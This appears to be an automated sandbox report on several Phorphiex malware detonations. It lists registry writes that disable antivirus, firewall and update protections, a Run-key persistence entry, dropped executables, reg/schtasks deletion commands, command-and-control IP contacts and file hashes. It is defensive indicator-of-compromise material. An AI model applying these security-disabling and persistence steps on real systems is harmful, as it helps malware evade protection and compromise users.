| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysfgdrvs.exe" | C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysfgdrvs.exe | C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe | N/A |
| File opened for modification | C:\Windows\sysfgdrvs.exe | C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\199244406.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\199244406.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe
"C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe"
C:\Windows\sysfgdrvs.exe
C:\Windows\sysfgdrvs.exe
C:\Users\Admin\AppData\Local\Temp\199244406.exe
C:\Users\Admin\AppData\Local\Temp\199244406.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Users\Admin\AppData\Local\Temp\2306424816.exe
C:\Users\Admin\AppData\Local\Temp\2306424816.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| IR | 91.98.117.42:40500 | udp | |
| UZ | 92.38.18.142:40500 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| MX | 201.142.207.146:40500 | udp | |
| IR | 93.117.47.108:40500 | udp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| VE | 190.142.176.189:40500 | udp | |
| RU | 178.35.11.103:40500 | udp | |
| UZ | 94.230.231.3:40500 | udp | |
| IE | 13.69.239.72:443 | tcp | |
| ID | 118.136.83.8:40500 | tcp | |
| AO | 129.122.134.187:40500 | udp | |
| IR | 2.176.225.120:40500 | udp | |
| VE | 186.88.229.81:40500 | udp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| SY | 95.212.112.29:40500 | udp | |
| IN | 59.91.192.121:40500 | udp | |
| IN | 117.206.42.72:40500 | tcp | |
| MX | 201.152.223.2:40500 | udp | |
| RU | 95.107.25.149:40500 | udp | |
| UZ | 217.30.161.82:40500 | udp | |
| VE | 186.93.213.2:40500 | udp | |
| IR | 80.191.218.209:40500 | udp | |
| IR | 2.180.211.101:40500 | tcp | |
| YE | 178.130.70.116:40500 | udp | |
| VE | 190.204.111.158:40500 | udp | |
| IR | 5.236.109.133:40500 | udp | |
| KZ | 147.30.149.82:40500 | udp | |
| UZ | 91.203.174.152:40500 | udp | |
| IR | 217.172.123.52:40500 | tcp | |
| IR | 37.156.213.185:40500 | udp | |
| PK | 39.53.167.181:40500 | udp | |
| AO | 155.89.3.139:40500 | tcp | |
| IR | 2.178.38.18:40500 | udp | |
| MX | 189.231.198.201:40500 | udp | |
| IR | 5.232.213.150:40500 | udp | |
| IR | 2.185.59.203:40500 | udp | |
| IN | 117.210.135.238:40500 | udp | |
| N/A | 5.164.177.231:40500 | tcp |
Files
memory/4928-132-0x0000000000000000-mapping.dmp
C:\Windows\sysfgdrvs.exe
| MD5 | 5db9a00364b3c87e0bc4c52d3fbda13d |
| SHA1 | f2e1f784019db62dd2866295499650a2a7d629dd |
| SHA256 | 39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3 |
| SHA512 | 7b472c384b011b24c8d4b0c7b67cc08f9708fee30bcbc38c93188064d1795ba581177cfbdd2f03d5a6f07c7ea4251c934f67710ade09ab04e9cb3884db94ef70 |
C:\Windows\sysfgdrvs.exe
| MD5 | 5db9a00364b3c87e0bc4c52d3fbda13d |
| SHA1 | f2e1f784019db62dd2866295499650a2a7d629dd |
| SHA256 | 39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3 |
| SHA512 | 7b472c384b011b24c8d4b0c7b67cc08f9708fee30bcbc38c93188064d1795ba581177cfbdd2f03d5a6f07c7ea4251c934f67710ade09ab04e9cb3884db94ef70 |
memory/1984-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\199244406.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\199244406.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1984-138-0x00000000002C0000-0x00000000002C6000-memory.dmp
memory/4316-139-0x0000000000000000-mapping.dmp
memory/1984-140-0x00007FFDDFC80000-0x00007FFDE0741000-memory.dmp
memory/2832-141-0x0000000000000000-mapping.dmp
memory/4836-142-0x0000000000000000-mapping.dmp
memory/4704-143-0x0000000000000000-mapping.dmp
memory/1984-144-0x00007FFDDFC80000-0x00007FFDE0741000-memory.dmp
memory/1664-145-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\2306424816.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\2306424816.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
Analysis: behavioral14
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220901-en
Max time kernel
82s
Max time network
128s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe
"C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe"
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5036 -ip 5036
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 264
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | tcp | |
| NL | 104.80.225.205:443 | tcp | |
| GB | 51.132.193.104:443 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp |
Files
memory/1284-135-0x0000000000F40000-0x0000000000F61000-memory.dmp
memory/5036-136-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/5036-139-0x0000000000400000-0x000000000045D000-memory.dmp
memory/1284-140-0x0000000000F40000-0x0000000000F61000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220901-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\wklopsvcs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\326623531.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\640611173.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\326623531.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\wklopsvcs.exe" | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
| File opened for modification | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\326623531.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\326623531.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe
"C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe"
C:\Windows\wklopsvcs.exe
C:\Windows\wklopsvcs.exe
C:\Users\Admin\AppData\Local\Temp\326623531.exe
C:\Users\Admin\AppData\Local\Temp\326623531.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\640611173.exe
C:\Users\Admin\AppData\Local\Temp\640611173.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| US | 69.67.151.86:40500 | udp | |
| MX | 187.200.200.171:40500 | tcp | |
| US | 104.208.16.90:443 | tcp | |
| IR | 89.41.14.197:40500 | udp | |
| VE | 38.25.251.44:40500 | udp | |
| US | 67.26.207.254:80 | tcp | |
| US | 67.26.207.254:80 | tcp | |
| US | 67.26.207.254:80 | tcp | |
| MX | 189.187.105.147:40500 | udp | |
| SY | 88.86.2.26:40500 | udp | |
| AF | 180.94.82.94:40500 | udp | |
| IR | 2.189.9.150:40500 | tcp | |
| UZ | 217.12.85.22:40500 | udp | |
| RU | 37.113.146.57:40500 | udp | |
| UZ | 62.209.134.144:40500 | udp | |
| IR | 188.211.211.65:40500 | udp | |
| YE | 178.130.111.57:40500 | udp | |
| PK | 39.53.170.40:40500 | tcp | |
| YE | 46.161.239.126:40500 | udp | |
| KG | 212.112.113.76:40500 | udp | |
| SY | 82.137.247.176:40500 | udp | |
| PK | 39.53.157.165:40500 | udp | |
| N/A | 10.230.3.187:40500 | udp | |
| IR | 5.234.0.173:40500 | tcp | |
| PK | 39.53.170.40:40500 | udp | |
| IR | 93.117.43.213:40500 | udp | |
| KZ | 188.94.152.3:40500 | udp | |
| VE | 190.205.141.97:40500 | udp | |
| AM | 94.228.28.234:40500 | udp | |
| VE | 190.36.145.78:40500 | tcp | |
| IR | 89.38.94.222:40500 | udp | |
| IR | 5.235.178.224:40500 | udp | |
| MX | 189.243.207.188:40500 | udp | |
| VE | 186.93.12.71:40500 | udp |
Files
memory/1012-132-0x0000000000000000-mapping.dmp
C:\Windows\wklopsvcs.exe
| MD5 | 209baf40779b80d5e443c3dbbd656bfb |
| SHA1 | b64fa8dded031d5dacac519a2035cefcd05e6503 |
| SHA256 | c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d |
| SHA512 | 9b4e3e82e141e569c85f22dd215f804b2f4e8969cda858662efca67532ba57d2e0acdbaa179524b4996be62f9acee3298eaf6cdfd03eff7e39e23bc7163c440e |
C:\Windows\wklopsvcs.exe
| MD5 | 209baf40779b80d5e443c3dbbd656bfb |
| SHA1 | b64fa8dded031d5dacac519a2035cefcd05e6503 |
| SHA256 | c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d |
| SHA512 | 9b4e3e82e141e569c85f22dd215f804b2f4e8969cda858662efca67532ba57d2e0acdbaa179524b4996be62f9acee3298eaf6cdfd03eff7e39e23bc7163c440e |
memory/2704-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\326623531.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\326623531.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/2704-138-0x0000000000C10000-0x0000000000C16000-memory.dmp
memory/1512-139-0x0000000000000000-mapping.dmp
memory/4328-140-0x0000000000000000-mapping.dmp
memory/4824-141-0x0000000000000000-mapping.dmp
memory/4548-142-0x0000000000000000-mapping.dmp
memory/2704-143-0x00007FFCA9D60000-0x00007FFCAA821000-memory.dmp
memory/2704-144-0x00007FFCA9D60000-0x00007FFCAA821000-memory.dmp
memory/1152-145-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\640611173.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\640611173.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
Analysis: behavioral19
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220812-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\fca1bb147cee65edf9ef821063fe3899d5ab3da1ca5310c9efe9913204675366.exe
"C:\Users\Admin\AppData\Local\Temp\fca1bb147cee65edf9ef821063fe3899d5ab3da1ca5310c9efe9913204675366.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
Files
memory/1100-54-0x00000000763F1000-0x00000000763F3000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220812-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\65694274.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2211424843.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winrecsv.exe" | C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe | N/A |
| File opened for modification | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\65694274.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\65694274.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe
"C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe"
C:\Windows\winrecsv.exe
C:\Windows\winrecsv.exe
C:\Users\Admin\AppData\Local\Temp\65694274.exe
C:\Users\Admin\AppData\Local\Temp\65694274.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\2211424843.exe
C:\Users\Admin\AppData\Local\Temp\2211424843.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| PK | 39.53.112.230:40500 | tcp | |
| UZ | 62.209.151.5:40500 | udp | |
| BY | 87.252.235.64:40500 | udp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| IR | 85.185.218.5:40500 | udp | |
| IR | 94.183.130.203:40500 | udp | |
| IR | 89.219.213.197:40500 | udp | |
| SY | 185.199.246.61:40500 | tcp | |
| UZ | 213.230.109.3:40500 | udp | |
| IR | 80.191.192.113:40500 | udp | |
| UZ | 213.230.90.158:40500 | udp | |
| UZ | 80.80.213.18:40500 | udp | |
| IR | 2.185.153.12:40500 | udp | |
| IR | 94.183.170.86:40500 | tcp | |
| MZ | 197.218.165.129:40500 | udp | |
| IR | 151.242.96.55:40500 | udp | |
| DZ | 105.106.149.0:40500 | udp | |
| UZ | 213.230.111.166:40500 | udp | |
| UZ | 62.209.138.180:40500 | udp | |
| AM | 46.130.160.140:40500 | tcp | |
| IR | 93.117.36.111:40500 | udp | |
| IR | 46.100.77.114:40500 | udp | |
| UZ | 213.230.109.3:40500 | tcp | |
| RU | 45.159.251.68:40500 | udp | |
